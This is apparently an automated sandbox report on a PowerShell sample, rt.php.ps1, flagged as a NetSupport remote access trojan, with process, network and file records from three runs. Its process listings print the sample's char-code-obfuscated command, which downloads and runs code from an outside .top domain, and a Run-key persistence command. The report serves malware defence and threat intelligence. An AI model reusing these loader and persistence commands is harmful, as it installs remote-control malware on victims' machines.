Malware Analysis Report

2025-06-16 05:06

Sample ID 230530-vsf6rsah38
Target rt.php.ps1
SHA256 8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8347464802fc276d09848d28162f8802566f8795a07521c535c693fdfdaa4c3d

Threat Level: Known bad

The file rt.php.ps1 was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Deletes itself

Adds Run key to start application

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-30 17:14

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win7-20230220-en

Max time kernel

1600s

Max time network

1602s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Network

N/A

Files

memory/1676-58-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/1676-59-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1676-60-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-61-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-62-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-63-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-64-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/1676-65-0x00000000024E0000-0x0000000002560000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win10v2004-20230220-en

Max time kernel

1552s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\34dW5imkHZMP\\whost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe""

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 40.125.122.151:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 20.42.65.85:443 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 2.36.159.162.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 112.208.253.8.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
NL 173.223.113.131:80 tcp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 134.121.24.20.in-addr.arpa udp
US 8.8.8.8:53 191.94.239.20.in-addr.arpa udp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puvg0ve5.tfy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1908-141-0x000001B75E2D0000-0x000001B75E2F2000-memory.dmp

memory/1908-143-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/1908-144-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/1908-145-0x000001B745C00000-0x000001B745C10000-memory.dmp

memory/3384-155-0x000001379F770000-0x000001379F780000-memory.dmp

memory/3384-156-0x000001379F770000-0x000001379F780000-memory.dmp

memory/1908-160-0x000001B75EF10000-0x000001B75EF1A000-memory.dmp

memory/1908-161-0x000001B75F2A0000-0x000001B75F2B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 75b4b2eecda41cec059c973abb1114c0
SHA1 11dadf4817ead21b0340ce529ee9bbd7f0422668
SHA256 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA512 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6ca57a0b3d565156f3c053e1c0743b6
SHA1 bf9251134a1e54956fd943969588382917d7b2f6
SHA256 35f9a5113cfed3fe3df6f0d5ef92c573e70d4aadc61b556973974d3f90d0b855
SHA512 aa891c80594b815e065601891656cef0996a1f8507dadec3381b33cb479a5921877b94da08b88dba6b7b2b6e9628458b592969cd2e4d36ad295264244fe5790d

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\client32.ini

MD5 5d2b788f10e973fce372fa2e4ececd4e
SHA1 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20

C:\Users\Admin\AppData\Roaming\34dW5imkHZMP\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-30 17:14

Reported

2023-05-30 17:45

Platform

win10-20230220-en

Max time kernel

403s

Max time network

1758s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

Signatures

NetSupport

rat netsupport

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExpirienceHost = "C:\\Users\\Admin\\AppData\\Roaming\\f9Av6lBR2ENs\\whost.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\rt.php.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias rzs $([char]105+[char]110+[char]118+[char]111+[char]107+[char]101+[char]45+[char]101+[char]120+[char]112+[char]114+[char]101+[char]115+[char]115+[char]105+[char]111+[char]110);$global:block=(New-Object $([char]83+[char]121+[char]115+[char]116+[char]101+[char]109+[char]46+[char]78+[char]101+[char]116+[char]46+[char]87+[char]101+[char]98+[char]67+[char]108+[char]105+[char]101+[char]110+[char]116) ).($([char]68+[char]111+[char]119+[char]110+[char]108+[char]111+[char]97+[char]100+[char]83+[char]116+[char]114+[char]105+[char]110+[char]103) )($([char]104+[char]116+[char]116+[char]112+[char]58+[char]47+[char]47+[char]100+[char]122+[char]55+[char]101+[char]103+[char]46+[char]116+[char]111+[char]112+[char]47+[char]53+[char]49+[char]53+[char]47+[char]115+[char]100+[char]102+[char]122+[char]119+[char]46+[char]112+[char]104+[char]112+[char]63+[char]105+[char]61) +$(hostname));rzs $global:block

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name ExpirienceHost -Value ""C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe""

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 dz7eg.top udp
US 143.244.162.145:80 dz7eg.top tcp
US 8.8.8.8:53 145.162.244.143.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 fduic.top udp
DE 167.235.159.22:443 fduic.top tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 22.159.235.167.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
JP 40.79.189.59:443 tcp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 254.211.247.8.in-addr.arpa udp

Files

memory/1608-124-0x00000251AA7C0000-0x00000251AA7E2000-memory.dmp

memory/1608-127-0x00000251AA970000-0x00000251AA9E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfemd1is.4ti.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1608-136-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/1608-137-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/1608-187-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/4760-189-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/4760-188-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/1608-190-0x00000251908B0000-0x00000251908C0000-memory.dmp

memory/4760-191-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/4760-200-0x000001FA76650000-0x000001FA76660000-memory.dmp

memory/1608-223-0x00000251AAF50000-0x00000251AAF5A000-memory.dmp

memory/1608-224-0x00000251AAF80000-0x00000251AAF92000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56efdb5a0f10b5eece165de4f8c9d799
SHA1 fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 df1a4ff784a50670244eb782884af91f
SHA1 0dbcddbafcc416b4b35820d9ae83ee70f63f2d2a
SHA256 93445522a6ba5648bd6618ca3ef2a70ee0a767fe87dcb7450aa939860e90f1ae
SHA512 eb252587929d2538adc642b0d18c6c94a23a5949262ea11256b2d1b7c108c7f4f95bf66a7d9bfece81bff522c972191867ed44739d76ef5df43d032b53899593

memory/3684-270-0x000001866E890000-0x000001866E8A0000-memory.dmp

memory/3684-271-0x000001866E890000-0x000001866E8A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2a93d653c9708e9b42505380eb60a1da
SHA1 abb42a825497e56c3006d53a48d776cc3ff8f5a9
SHA256 a91f1a988cf3729c94e1d0d0fda0d379462ae678c487e6d179f5ca1f4e1a948e
SHA512 44505d7ee19221379372155a26377ec1e7acc1c34823b0d8bd9e20379cc1e980ead4de8304e02dfe448ee5b642d94e47d7796eef1d13e6179b758217f3173013

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.dll

MD5 00587238d16012152c2e951a087f2cc9
SHA1 c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcichek.dll

MD5 a0b9388c5f18e27266a31f8c5765b263
SHA1 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll

MD5 dcde2248d19c778a41aa165866dd52d0
SHA1 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512 c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\NSM.LIC

MD5 390c964070626a64888d385c514f568e
SHA1 a556209655dcb5e939fd404f57d199f2bb6da9b3
SHA256 ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54
SHA512 f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\client32.ini

MD5 5d2b788f10e973fce372fa2e4ececd4e
SHA1 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1
SHA256 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475
SHA512 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20

C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\HTCTL32.DLL

MD5 2d3b207c8a48148296156e5725426c7f
SHA1 ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256 edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
